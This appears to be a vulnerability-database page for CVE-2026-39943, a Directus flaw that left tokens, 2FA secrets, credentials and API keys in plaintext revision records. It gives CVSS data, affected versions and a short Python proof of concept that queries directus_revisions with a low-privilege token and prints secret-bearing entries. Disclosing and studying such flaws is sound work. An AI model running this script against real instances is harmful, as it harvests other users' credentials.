Security Vulnerability Report
中文
CVE-2026-39943 CVSS 6.5 MEDIUM

CVE-2026-39943

Published: 2026-04-09 17:16:30
Last Modified: 2026-04-14 17:34:15
Source: [email protected]

Description

Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus stores revision records (in directus_revisions) whenever items are created or updated. Due to the revision snapshot code not consistently calling the prepareDelta sanitization pipeline, sensitive fields (including user tokens, two-factor authentication secrets, external auth identifiers, auth data, stored credentials, and AI provider API keys) could be stored in plaintext within revision records. This vulnerability is fixed in 11.17.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:* - VULNERABLE
Directus < 11.17.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL for Directus API target_url = "https://target-directus-instance.com/items/directus_revisions" # Authorization token (Low-privileged user token) headers = { "Authorization": "Bearer LOW_PRIVILEGE_TOKEN" } # Send GET request to fetch revision records response = requests.get(target_url, headers=headers) if response.status_code == 200: data = response.json() # Check for sensitive fields in the response data for item in data['data']: print(f"Revision ID: {item['id']}") # Sensitive data might be nested in 'data' field of the revision if 'data' in item and ('token' in str(item['data']) or 'secret' in str(item['data'])): print(f"[!] Potential sensitive data found: {item['data']}") else: print("Failed to retrieve data")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39943", "sourceIdentifier": "[email protected]", "published": "2026-04-09T17:16:29.960", "lastModified": "2026-04-14T17:34:15.280", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus stores revision records (in directus_revisions) whenever items are created or updated. Due to the revision snapshot code not consistently calling the prepareDelta sanitization pipeline, sensitive fields (including user tokens, two-factor authentication secrets, external auth identifiers, auth data, stored credentials, and AI provider API keys) could be stored in plaintext within revision records. This vulnerability is fixed in 11.17.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-312"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.17.0", "matchCriteriaId": "F2EBB337-0000-4792-940F-DAEFCFC17747"}]}]}], "references": [{"url": "https://github.com/directus/directus/releases/tag/v11.17.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/directus/directus/security/advisories/GHSA-mvv8-v4jj-g47j", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.